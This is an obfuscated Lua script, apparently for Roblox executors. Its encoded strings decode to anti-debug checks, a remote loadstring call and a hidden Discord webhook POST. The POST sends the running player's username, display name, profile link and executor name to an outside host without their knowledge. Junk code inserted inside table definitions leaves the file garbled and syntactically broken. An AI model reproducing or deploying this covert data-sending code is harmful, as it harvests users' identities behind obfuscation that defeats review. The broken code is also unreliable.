local function _0x0000()
local _0x0001 = {}
for _0x0002 = 1, (672 - 31) do
_0x0001[_0x0002] = _0x0002 * 2
end
if (2 * 3 > 5) and type(debug) == (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4},{116,97,98,108,101}) then error((function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({6,0,1,7,8,2,9,10,1,3,11,3,12,2,4,0,5,0,13,5,0,4},{101,98,32,114,100,116,68,117,103,108,105,97,121,99}), 0) end
do
if (5 == 5) and _0x0006._0x0007 or _0x0006._0x0008 or _0x0006._0x0009 then error((function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({5,0,6,7,8,3,0,1,9,10,11,12,1,13,0,1,2,3,4,0,2,0,14,2,0,4},{101,110,116,32,100,68,98,117,103,118,105,114,111,109,99}), 0) end
if (2 * 3 > 5) and type(print) ~= (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,2,0,3,4,5,6,0},{110,102,117,99,116,105,111}) then error((function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({7,5,1,2,8,2,0,1,6,0,3,9,2,10,5,3,11,0,3,4,6,1,0,4,0,12,4,0,1},{101,100,105,110,116,111,32,77,102,118,114,109,99}), 0) end
end
end
local function _0x000a(_0x000b)
if (1 + 1 == 2) and _0x000b > 0 then
return _0x000b * 2
else
return 0
end
end
_0x0000()
for _0x000c = 1, (14 / 2) do
_0x000c = _0x000c + (487 - 60)
end
local _0x000d = _0x000e:_0x000f((function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4,5,6},{80,108,97,121,101,114,115}))
local _0x0010 = _0x000e:_0x000f((function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({2,0,0,3,4,1,5,6,7,8,1},{116,101,72,112,83,114,118,105,99}))
local _0x0011 = _0x000d._0x0012
_0x001c._0x001d(function()
for _0x002c = 1, 2 do
_0x002c = _0x002c * 2
end
pcall(function()
local _0x002d = (475 + 475)
local _0x002e = (95 + 95)
local _0x002f = (458 + 458)
_0x0030(_0x000e:_0x0031(""))()
end)
local function _0x0032()
local _0x0033 = (2788 / 4)
for _0x0002 = 1, (5 + 5) do
_0x0033 = _0x0033 + _0x0002
end
return _0x0033
end
end)
local _0x0037 = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({6,16,16,12,13,37,3,3,17,18,13,19,4,14,17,38,19,4,20,3,39,12,18,3,21,40,22,6,4,4,41,13,3,42,7,0,2,0,8,1,5,1,9,9,0,23,0,10,8,7,2,2,24,43,24,7,0,2,0,8,1,5,1,9,9,0,23,0,10,8,7,2,2,44,3,25,25,45,4,6,46,26,11,0,47,48,49,27,28,1,29,1,14,50,22,30,1,31,15,32,31,2,51,15,52,53,33,27,34,1,54,55,15,56,11,21,34,5,26,57,29,11,10,58,20,35,10,5,30,59,5,36,1,6,60,11,12,35,28,14,36,33,32},{54,51,48,47,111,53,104,55,52,50,56,65,112,115,114,85,116,100,105,99,109,119,98,57,32,77,66,81,117,45,70,103,95,80,108,89,102,58,46,97,101,107,40,43,41,72,49,79,75,73,90,118,86,120,84,110,78,76,122,121,71})
if (true or false) and not true then
local _0x0038 = {(1346 / 2), (900 - 70), (91 - 67)}
table.insert(_0x0038, (482 - 82))
end
local _0x0048 = {
for _0x0049 = 1, 2 do
_0x0049 = _0x0049 * 2
end
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({2,3,0,1,4,0,1},{110,116,99,111,101})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({6,7,8,1,2,0,1,3,2,2,9,4,0,0,10,3,4,1,3,0,0,0,5,11,5,12,13,14},{48,53,54,50,55,32,60,64,40,57,51,47,52,41,62}),
local _0x004a = {}
for _0x0002 = 1, (2799 / 3) do
_0x004a[_0x0002] = _0x0002 * 2
end
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,2,0,3,4,5,6,0},{101,117,115,114,110,97,109})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({2,3,0,4,5,6,7,8,9,1,1,10,0},{114,103,83,99,105,112,116,32,76,111,101}),
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,0,3,4},{101,109,98,100,115})] = {
for _0x004b = 1, (4 + 4) do
_0x004b = math.floor(_0x004b / 2)
end
{
for _0x004c = 1, 3 do
_0x004c = math.abs(_0x004c)
end
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,0,2,3},{116,105,108,101})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({8,0,5,5,3,6,1,7,0,2,9,1,10,0,4,2,11,1,12,2,6,0,13,4,1,14,15,3,2,16,4,3,7},{105,32,99,101,116,103,114,100,110,107,98,104,83,112,69,120,117}),
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,2,3,4,5,0,6,7,0,8,9},{105,100,101,115,99,114,112,116,111,110})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({8,0,3,1,4,2,0,9,5,1,0,10,6,5,7,4,7,0,11,6,3,2,0,1,12,2,13,14,15,16},{32,115,114,117,101,97,111,100,65,104,108,121,99,105,112,116,46}),
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,0,2,0,3},{111,99,108,114})] = (32640 + 32640),
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4,5},{102,105,101,108,100,115})] = {
{[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3},{110,97,109,101})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,2,0,3,4,5,6,0},{101,85,115,114,110,97,109}), [(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4},{118,97,108,117,101})] = _0x0011._0x004e, [(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,0,1,3},{105,110,108,101})] = true},
local function _0x004f(_0x0050)
if (true or false) and _0x0050 > 0 then
return _0x0050 * 2
else
return 0
end
end
{[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3},{110,97,109,101})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,2,3,4,5,0,6,7,8,0,9,10},{97,68,105,115,112,108,121,32,78,109,101}), [(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4},{118,97,108,117,101})] = _0x0011._0x0051, [(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,0,1,3},{105,110,108,101})] = true},
{
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3},{110,97,109,101})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,2,3,4,0,5,6,7,8,0,9,10},{105,80,114,111,102,108,101,32,76,110,107}),
for _0x0052 = 1, 1 do
_0x0052 = _0x0052 + (582 - 13)
end
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4},{118,97,108,117,101})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0},{91}) .. tostring(_0x0011._0x0059) .. (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({7,8,9,4,4,10,1,11,0,0,2,2,2,5,6,3,12,13,3,14,5,15,3,16,0,17,1,18,6,1,0},{47,115,119,111,116,46,114,93,40,104,112,58,98,108,120,99,109,117,101}) .. tostring(_0x0011._0x0059) .. (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4,5,6,7,8},{47,112,114,111,102,105,108,101,41}),
local _0x005a = {}
for _0x0002 = 1, (490 + 491) do
_0x005a[_0x0002] = _0x0002 * 2
end
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,0,1,3},{105,110,108,101})] = true
local _0x005b = (105 + 105)
}
local function _0x005c(_0x005d)
if (true or false) and _0x005d > 0 then
return _0x005d * 2
else
return 0
end
end
},
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({1,0,0,2,3,4},{111,102,116,101,114})] = {[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,0},{116,101,120})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({2,3,1,4,5,6,1,7,0,8,9,0,10,11,12,13,14,15,0},{32,101,69,120,99,117,116,100,105,110,74,111,98,73,68,58}) .. _0x000e._0x005e}
}
local _0x005f = {(1542 / 3), (800 / 2), (624 - 25)}
table.insert(_0x005f, (1866 / 2))
}
if (2 * 3 > 5) and false then
local _0x0060 = (1168 / 2)
if (2 * 3 > 5) and _0x0060 > (342 + 342) then
_0x0060 = _0x0060 * 2
elseif _0x0060 < (242 + 242) then
_0x0060 = 0
end
end
}
local _0x0061 = _0x0010:_0x0062(_0x0048)
local _0x0063 = {}
for _0x0002 = 1, (191 + 192) do
_0x0063[_0x0002] = _0x0002 * 2
end
local _0x0068 = (type(_0x0069) == (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4},{116,97,98,108,101}) and _0x0069._0x006a) or
local function _0x006b(_0x006c)
if (5 == 5) and _0x006c > 0 then
return _0x006c * 2
else
return 0
end
end
(type(_0x006d) == (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4},{116,97,98,108,101}) and _0x006d._0x006a) or
(type(_0x006e) == (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3,4},{116,97,98,108,101}) and _0x006e._0x006a) or
_0x006f or
for _0x0070 = 1, (3 + 3) do
_0x0070 = _0x0070 % (400 / 4)
end
_0x006a
for _0x0071 = 1, (5 + 5) do
_0x0071 = _0x0071 + (151 + 151)
end
if (5 == 5) and _0x0068 then
pcall(function()
_0x0068({
_0x0078 = _0x0037,
_0x0079 = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,2,3},{80,79,83,84}),
_0x007a = {
[(function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({3,4,0,1,2,0,1,5,6,7,8,2},{110,116,101,67,111,45,84,121,112})] = (function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({0,1,1,5,2,6,0,7,2,3,4,8,9,10,3,4},{97,112,105,111,110,108,99,116,47,106,115})
local function _0x007b()
local _0x007c = (1286 / 2)
for _0x0002 = 1, (5 + 5) do
_0x007c = _0x007c + _0x0002
end
return _0x007c
end
},
if (true or false) and 0 == 1 then
local _0x007d = {}
for _0x0002 = 1, 3 do
_0x007d[_0x0002] = _0x0002 * 2
end
end
_0x007e = _0x0061
local _0x007f = (3872 / 4)
local _0x0080 = (652 - 18)
local _0x0081 = (299 + 300)
})
end)
else
_0x0082((function(_0x0003,_0x0004)local _0x0005=""for _0x0002=1,#_0x0003 do _0x0005=_0x0005..string.char(_0x0004[_0x0003[_0x0002]+1])end return _0x0005 end)({14,2,15,16,1,1,4,0,17,5,18,6,2,19,20,0,21,22,2,7,8,9,1,10,0,6,5,7,4,11,0,23,3,3,12,0,12,24,25,3,0,11,8,13,13,1,10,9,26},{32,111,101,84,107,97,108,99,117,116,114,115,80,112,87,98,104,102,105,100,58,69,120,72,79,83,46}))
end
